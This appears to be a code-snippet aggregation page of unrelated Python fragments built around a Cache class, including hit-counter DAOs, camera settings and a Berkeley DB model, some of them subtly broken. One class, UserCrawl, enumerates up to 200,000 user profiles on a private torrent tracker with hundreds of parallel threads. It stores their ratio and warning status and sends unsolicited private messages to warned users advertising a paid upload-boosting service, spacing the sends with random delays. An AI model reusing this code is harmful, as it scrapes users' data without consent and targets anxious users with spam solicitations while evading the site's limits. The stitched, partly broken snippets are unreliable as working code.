 def __init__(self, datastream):
     self.datastream = datastream
     #self.datastream_revision = datastream.last_published_revision
     self.search_index = ElasticsearchIndex()
     self.logger=logging.getLogger(__name__)
     self.cache=Cache()
Пример #38
0
class VisualizationHitsDAO:
    """class for manage access to Hits in DB and index"""

    doc_type = "vz"
    from_cache = False

    # cache ttl, 1 hora
    TTL = 3600

    def __init__(self, visualization):
        self.visualization = visualization
        self.search_index = ElasticsearchIndex()
        self.logger = logging.getLogger(__name__)
        self.cache = Cache()

    def add(self, channel_type):
        """agrega un hit al datastream. """

        try:
            hit = VisualizationHits.objects.create(
                visualization_id=self.visualization.visualization_id, channel_type=channel_type
            )
        except IntegrityError:
            # esta correcto esta excepcion?
            raise VisualizationNotFoundException()

        self.logger.info("VisualizationHitsDAO hit! (guid: %s)" % (self.datastream.guid))

        # armo el documento para actualizar el index.
        doc = {
            "docid": "%s::%s" % (self.doc_type.upper(), self.visualization.guid),
            "type": self.doc_type,
            "script": "ctx._source.fields.hits+=1",
        }

        return self.search_index.update(doc)

    def count(self):
        return VisualizationHits.objects.filter(visualization_id=self.visualization.visualization_id).count()

    def _get_cache(self, cache_key):

        cache = self.cache.get(cache_key)

        return cache

    def _set_cache(self, cache_key, value):

        return self.cache.set(cache_key, value, self.TTL)

    def count_by_day(self, day):
        """retorna los hits de un día determinado"""

        # si es datetime, usar solo date
        if type(day) == type(datetime.today()):
            day = day.date()

        cache_key = "%s_hits_%s_by_date_%s" % (self.doc_type, self.visualization.guid, str(day))

        hits = self._get_cache(cache_key)

        # si el día particular no esta en el caché, lo guarda
        # salvo que sea el parametro pasado sea de hoy, lo guarda en el cache pero usa siempre el de la DB
        if not hits or day == date.today():
            hits = VisualizationHits.objects.filter(
                visualization=self.visualization, created_at__startswith=day
            ).count()

            self._set_cache(cache_key, hits)

        return (date, hits)

    def count_by_days(self, day=30, channel_type=None):
        """trae un dict con los hits totales de los ultimos day y los hits particulares de los días desde day hasta today"""

        # no sé si es necesario esto
        if day < 1:
            return {}

        cache_key = "%s_hits_%s_%s" % (self.doc_type, self.visualization.guid, day)

        if channel_type:
            cache_key += "_channel_type_%s" % channel_type

        hits = self._get_cache(cache_key)

        # me cachendié! no esta en la cache
        if not hits:
            # tenemos la fecha de inicio
            start_date = datetime.today() - timedelta(days=day)

            # tomamos solo la parte date
            truncate_date = connection.ops.date_trunc_sql("day", "created_at")

            qs = VisualizationHits.objects.filter(visualization=self.visualization, created_at__gte=start_date)

            if channel_type:
                qs = qs.filter(channel_type=channel_type)

            hits = (
                qs.extra(select={"_date": truncate_date, "fecha": "DATE(created_at)"})
                .values("fecha")
                .order_by("created_at")
                .annotate(hits=Count("created_at"))
            )

            control = [date.today() - timedelta(days=x) for x in range(day - 1, 0, -1)]
            control.append(date.today())

            for i in hits:
                try:
                    control.remove(i["fecha"])
                except ValueError:
                    pass

            hits = list(hits)

            for i in control:
                hits.append({"fecha": i, "hits": 0})

            hits = sorted(hits, key=lambda k: k["fecha"])

            # transformamos las fechas en isoformat
            hits = map(self._date_isoformat, hits)

            # lo dejamos, amablemente, en la cache!
            self._set_cache(cache_key, json.dumps(hits, cls=DjangoJSONEncoder))

            self.from_cache = False
        else:
            hits = json.loads(hits)
            self.from_cache = True

        return hits

    def _date_isoformat(self, row):
        row["fecha"] = row["fecha"].isoformat()
        return row
Пример #39
0
 def _delete_cache(self, cache_key, cache_db=0):
     """ limpiar un cache específico
     cache_db=0 es el cache principal (CACHE_DATABASES)
     usado para actualizar luego de modificar recursos que requieren actualización rápida"""
     c = Cache(db=cache_db)
     c.delete(cache_key)
Пример #40
0
 def __init__(self, visualization):
     self.visualization = visualization
     self.search_index = ElasticsearchIndex()
     self.logger = logging.getLogger(__name__)
     self.cache = Cache()
Пример #41
0
 def _delete_cache(self, cache_key, cache_db=0):
     """ limpiar un cache específico
     cache_db=0 es el cache principal (CACHE_DATABASES)
     usado para actualizar luego de modificar recursos que requieren actualización rápida"""
     c = Cache(db=cache_db)
     c.delete(cache_key)
Пример #42
0
class UploadCheck(AdultAlert):
    cache = Cache()

    is_store = True

    def parse(self, soup_obj):
        assert soup_obj is not None

        info_block = soup_obj.select(
            "#info_block table tr td:nth-of-type(1) span")[0]

        prev_info = ""
        upload = 0
        download = 0
        for info in info_block.contents:
            if "上傳量" in prev_info:
                upload = HttpUtils.pretty_format(info, "GB")
            elif "下載量" in prev_info:
                download = HttpUtils.pretty_format(info, "GB")
                break
            prev_info = str(info)

        return upload, download

    def filter(self, data):
        return data

    def action(self, data):
        prev_up = self.cache.get("mt_up")
        prev_down = self.cache.get("mt_down")

        if prev_up is None:
            prev_up = 0
        else:
            prev_up = float(prev_up.decode())
        if prev_down is None:
            prev_down = 0
        else:
            prev_down = float(prev_down.decode())

        delta_up = round(data[0] - prev_up, 2)
        delta_down = round(data[1] - prev_down, 2)
        if delta_down == 0:
            delta_ratio = "Inf"
        else:
            delta_ratio = round(delta_up / delta_down, 2)

        upload_target = Config.get("mteam_upload_target")
        current_upload = round(data[0] - data[1], 2)
        print(
            "%s, upload=%s, download=%s, current=%s, delta_up=%s, delta_down=%s, delta_ratio=%s, target=%s"
            %
            (str(time.strftime("%Y-%m-%d %H:%M:%S")), data[0], data[1],
             current_upload, delta_up, delta_down, delta_ratio, upload_target))

        if self.is_store:
            self.cache.set("mt_up", data[0])
            self.cache.set("mt_down", data[1])

        if upload_target < current_upload:
            for i in range(5):
                EmailSender.send(u"完成上传", Config.get("mteam_username"))
                time.sleep(10000)

    def init(self):
        self.cache.set("mt_up", 0)
        self.cache.set("mt_down", 0)

    def check_not_store(self):
        # backup current configuration
        is_store = self.is_store
        self.is_store = False
        self.check()
        self.is_store = is_store
Пример #43
0
 def getBrightness():
     value = Cache().get("brightness")
     if value is None:
         value = 60
         Cache().set("brightness", value)
     return value
Пример #44
0
 def setBrightness(delta):
     value = int(Camera.getBrightness()) + int(delta)
     value = min(100, max(0, value))
     Cache().set("brightness", value)
Пример #45
0
 def is_enable_face_detect():
     return Cache().get("face_detect") == "1"
Пример #46
0
 def __init__(self, clsobj=XParcel):
     self.__db = DB()
     self.__cache = Cache()
     self.__clsobj = clsobj
     self.maxCount = 4096
Пример #47
0
class UserCrawl(NormalAlert):
    buffer = []
    errors = []

    id_bucket_name = "mteam_user_id"
    name_bucket_name = "mteam_user_name"
    msg_bucket_name = "mteam_msg"

    min_id = 1
    max_id = 200000
    scan_batch_size = 500
    skip_if_exist = False  # ignore cache and re-crawl all user

    cache = Cache()

    msg_subject = "分享率过低的账户会被警告并封禁,请注意(%s)"
    msg_body = "如需快速增加上传,消除警告,请微信联系 helloword1984(用户名是薛定谔的小仓鼠)\n\n注1:本人非网站工作人员\n注2:如果打扰到了您,表示抱歉,请pm回复'谢谢勿扰'"

    msg_urgent_subject = "注意!注意!注意!分享率低于0.3的账户可能随时会被封号!"
    msg_urgent_body = "如需快速增加上传,消除警告,请微信联系 helloword1984(用户名是薛定谔的小仓鼠)\n\n注1:本人非网站工作人员\n注2:如果打扰到了您,表示抱歉,请pm回复'谢谢勿扰'"

    def generate_site(self):
        self.site.home_page = "https://kp.m-team.cc/userdetails.php?id=%s"
        return self.site

    def crawl_single(self, user_id):

        if self.skip_if_exist and self.cache.hash_get(self.id_bucket_name,
                                                      user_id) is not None:
            print("Skip " + str(user_id))
            return

        try:
            url = self.site.home_page % str(user_id)
            soup_obj = HttpUtils.get(url,
                                     headers=self.site.login_headers,
                                     return_raw=False)
            assert soup_obj is not None

            user = User()
            user.id = user_id
            user.name = HttpUtils.get_content(soup_obj, "#outer h1 span b")

            if user.name is None:
                return

            user.is_warn = len(
                soup_obj.select("#outer h1 span img[alt='Leechwarned']")) > 0
            user.is_ban = len(
                soup_obj.select("#outer h1 span img[alt='Disabled']")) > 0
            if user.is_warn:
                user.warn_time = str(time.strftime("%Y-%m-%d %H:%M:%S"))

            try:
                if len(soup_obj.select("#outer table tr")) <= 5:
                    user.is_secret = True
                    # print("secret user: name={0} id={1}".format(user.name, str(user_id)))
                else:
                    tr_list = soup_obj.select("#outer table tr")
                    for tr in tr_list:
                        td_name = HttpUtils.get_content(
                            tr, "td:nth-of-type(1)")
                        if td_name == "加入日期":
                            user.create_time = HttpUtils.get_content(
                                tr, "td:nth-of-type(2)").replace(" (", "")
                        elif td_name == "最近動向":
                            user.last_time = HttpUtils.get_content(
                                tr, "td:nth-of-type(2)").replace(" (", "")
                        elif td_name == "傳送":
                            user.ratio = HttpUtils.get_content(
                                tr, "td:nth-of-type(2) table tr td font")
                            if user.ratio is None:
                                # seems that no download is made and ratio is infinite
                                user.ratio = -1
                                user.up = self.parse_size_in_gb(
                                    HttpUtils.get_content(
                                        tr,
                                        "td:nth-of-type(2) table tr:nth-of-type(1) td:nth-of-type(1)",
                                        1))
                                user.down = self.parse_size_in_gb(
                                    HttpUtils.get_content(
                                        tr,
                                        "td:nth-of-type(2) table tr:nth-of-type(1) td:nth-of-type(2)",
                                        2))
                            else:
                                user.ratio = user.ratio.replace(",", "")
                                user.up = self.parse_size_in_gb(
                                    HttpUtils.get_content(
                                        tr,
                                        "td:nth-of-type(2) table tr:nth-of-type(2) td:nth-of-type(1)",
                                        1))
                                user.down = self.parse_size_in_gb(
                                    HttpUtils.get_content(
                                        tr,
                                        "td:nth-of-type(2) table tr:nth-of-type(2) td:nth-of-type(2)",
                                        2))
                        elif td_name == "魔力值":
                            user.mp = HttpUtils.get_content(
                                tr, "td:nth-of-type(2)")

                    # parse rank
                    user.rank = "secret"
                    imgs = soup_obj.select(
                        "table.main table tr > td > img[title!='']")
                    for img in imgs:
                        if not img.has_attr("class"):
                            user.rank = img["title"]

                            if "Peasant" in user.rank:
                                user.warn_time = str(
                                    time.strftime("%Y-%m-%d %H:%M:%S"))
                                # print("###### find user="******" id=" + str(user_id) + " rank=" + user.rank)
            except Exception as e:
                print(str(user_id) + "\n" + str(e) + "\n")

            self.buffer.append(user)
        except Exception as e:
            print(">>>>> fail to parse " + str(user_id))
            self.errors.append(user_id)

    def parse_size_in_gb(self, size_str):
        assert size_str is not None
        return HttpUtils.pretty_format(size_str.replace(": ", ""), "GB")

    def store_cache(self, data):
        if data is None or len(data) == 0:
            return

        for user in data:
            res = self.cache.hash_get(self.id_bucket_name, user.id)
            if res is not None:
                exist_user = User.parse(res.decode())
                # warned before, do not update warn time
                if user.is_warn and exist_user.is_warn:
                    user.warn_time = exist_user.warn_time

            self.cache.hash_set(self.id_bucket_name, user.id, str(user))
            self.cache.hash_set(self.name_bucket_name, user.name, str(user))

        print("########### finish storing cache ###########")

    def crawl(self, ids=None):
        self.login_if_not()

        if ids is None:
            ids = range(self.min_id, self.max_id)
            self.skip_if_exist = True

        start = 0
        end = len(ids)
        step = self.scan_batch_size

        current = start
        while current < end:
            print(">>>>>>>>>>>> crawl {0} -> {1} >>>>>>>>>>>>>>>>".format(
                ids[current], ids[min(current + step, end - 1)]))
            ParallelTemplate(500).run(
                func=self.crawl_single,
                inputs=ids[current:min(current + step, end)])
            current += step + 1

            if len(self.errors) > 0:
                print(">>>>>>>>>>>>>>>>> retry >>>>>>>>>>>>>>>>>>>>>>")
                ParallelTemplate(100).run(func=self.crawl_single,
                                          inputs=self.errors)
                self.errors.clear()
                print(
                    ">>>>>>>>>>>>>>>>> retry finished >>>>>>>>>>>>>>>>>>>>>>")

            if len(self.buffer) > 300:
                self.store_cache(self.buffer)
                self.buffer.clear()

        # write all others left
        self.store_cache(self.buffer)
        self.buffer.clear()

    def refresh(self):
        ids = list(
            sorted(
                map(lambda x: int(x.decode()),
                    self.cache.hash_get_all_key(self.id_bucket_name))))
        print("max ID=" + str(ids[-1]))
        self.min_id = ids[-1] + 1
        self.max_id = self.min_id + 1000

        print("\n############## refresh user ##############\n")
        # refresh existing user
        self.crawl(ids)

        print("\n############## crawl new user ##############\n")
        # find new user
        self.crawl()

    def warn(self):
        self.refresh()
        warn_white_list = str(Config.get("mt_warn_white_list")).split("|")

        user_ids = self.cache.hash_get_all_key(self.id_bucket_name)
        now = datetime.now()
        for user_id in user_ids:
            user_str = self.cache.hash_get(self.id_bucket_name,
                                           user_id).decode()
            user = User.parse(user_str)
            if user.is_ban or not user.is_warn or "VIP" in user.rank or "職人" in user.rank:
                continue
            if user.is_secret or (0.5 > user.ratio > -1 or
                                  (0.9 > user.ratio
                                   and user.down - user.up > 50)):
                if user.create_time == "":
                    create_since = 999999
                else:
                    create_time = datetime.strptime(user.create_time,
                                                    "%Y-%m-%d %H:%M:%S")
                    create_since = (now - create_time).days
                warn_time = datetime.strptime(user.warn_time,
                                              "%Y-%m-%d %H:%M:%S")
                warn_since = (now - warn_time).days
                print("{0}|{1}|{2}".format(str(user), str(create_since),
                                           str(warn_since)))

                # new user and ratio lower than 0.3 will be baned any time
                if create_since < 30 and user.ratio < 0.3 and warn_since in [
                        0, 1
                ]:
                    self.send_msg(user.id, self.msg_urgent_subject,
                                  self.msg_urgent_body)
                    continue

                # skip user who has registered for less than 2 days
                if create_since < 2:
                    continue

                if user.name in warn_white_list:
                    continue

                if warn_since in [0, 3, 5]:
                    self.send_msg(user.id, self.msg_subject % (7 - warn_since),
                                  self.msg_body)

    def order(self, limit=250):
        user_ids = self.cache.hash_get_all_key(self.id_bucket_name)
        users = []
        for user_id in user_ids:
            user_str = self.cache.hash_get(self.id_bucket_name,
                                           user_id).decode()
            user = User.parse(user_str)
            if not user.is_secret and not user.is_ban and user.ratio >= 0 and user.down >= 10 and "VIP" not in user.rank and "職人" not in user.rank:
                users.append(user)

        users.sort(key=lambda x: x.ratio)
        for i in range(0, int(limit)):
            print(users[i])

    def load_by_id(self, user_id):
        res = self.cache.hash_get(self.id_bucket_name, user_id)
        if res is not None:
            print(res.decode())
        else:
            print("Cannot find user by ID: " + user_id)

    def load_by_name(self, user_name):
        res = self.cache.hash_get(self.name_bucket_name, user_name)
        if res is not None:
            print(res.decode())
        else:
            print("Cannot find user by name: " + user_name)

    def send_msg(self, user_id, subject, body):
        if self.cache.get(self.msg_bucket_name + str(user_id)) is not None:
            print("Skip sending msg, user in cache: " + str(user_id))
            return

        self.login_if_not()

        url = "https://kp.m-team.cc/takemessage.php"
        data = {
            "receiver": user_id,
            "subject": subject,
            "body": body,
            "save": "yes"
        }

        HttpUtils.post(url=url, data=data, headers=self.site.login_headers)
        print(">>>>>>>>> Send msg to {0}, subject={1}, body={2} >>>>>>>>>>".
              format(user_id, subject, body))

        self.cache.set_with_expire(self.msg_bucket_name + str(user_id), "",
                                   86400)

        # sleep 30 ~ 120 seconds before sending next message
        time.sleep(round(30 + random.random() * 90))
Пример #48
0
class Model:
    def __init__(self, clsobj=XParcel):
        self.__db = DB()
        self.__cache = Cache()
        self.__clsobj = clsobj
        self.maxCount = 4096

    def open(self, filepath, mode='w'):
        self.mode = mode
    	intMode = {'r':DB_RDONLY, 'w':DB_CREATE|DB_TRUNCATE, 'a':DB_CREATE}[mode]
        self.__db.setcache(256*1024*1024, 0)
        return self.__db.open(filepath, intMode)

    def close(self):
        self.sync()
        self.__db.close()

    def put(self, key, data):    
        self.__cache.put(key, data)
        self.__measure()

    def get(self, key):
        value = self.__cache.get(key)
        if not value:
            value = self.db_get(key)
            if value:
                self.__cache.put(key, value)
                self.__measure()
        return value

    def keys(self):
        self.sync()
        cursor = self.__db.cursor()
        result = cursor.get(None, DB_FIRST|XDB_NOT_RETRIEVE_VAL)
        while result:
            if not result[0].startswith('__'):
                yield result[0]
            result = cursor.get(None, DB_NEXT|XDB_NOT_RETRIEVE_VAL)
        cursor.close()

    def values(self):
        self.sync()
        cursor = self.__db.cursor()
        result = cursor.get(None, DB_FIRST)
        while result:
            if not result[0].startswith('__'):
                obj = self.__clsobj()
                obj.unpack(result[1])
                yield obj
            result = cursor.get(None, DB_NEXT)
        cursor.close()
        
    def sync(self):
        for key, value in self.__cache.items():
            self.db_put(key, value)

    def items(self):
        self.__cache.cache_sync()
        cursor = self.__db.cursor()
        result = cursor.get(None, DB_FIRST)
        while result:
            if not result[0].startswith('__'):
                obj = self.__clsobj()
                obj.unpack(result[1])
                yield result[0], obj
            result = cursor.get(None, DB_NEXT)
        cursor.close()
        
    def __measure(self):
        while len(self.__cache) > self.maxCount:
            #print len(self.__cache), self.__cache.__dict__
            key, value = self.__cache.top()
            self.db_put(key, value)
            self.__cache.pop()

    def db_get(self, key):
        result = self.__db.get(key, 0)
        if result:
            obj = self.__clsobj()
            obj.unpack(result[1])
            return obj
        return None

    def db_put(self, key, data):
        if self.mode != 'r':
            return self.__db.put(key, data.pack(), 0)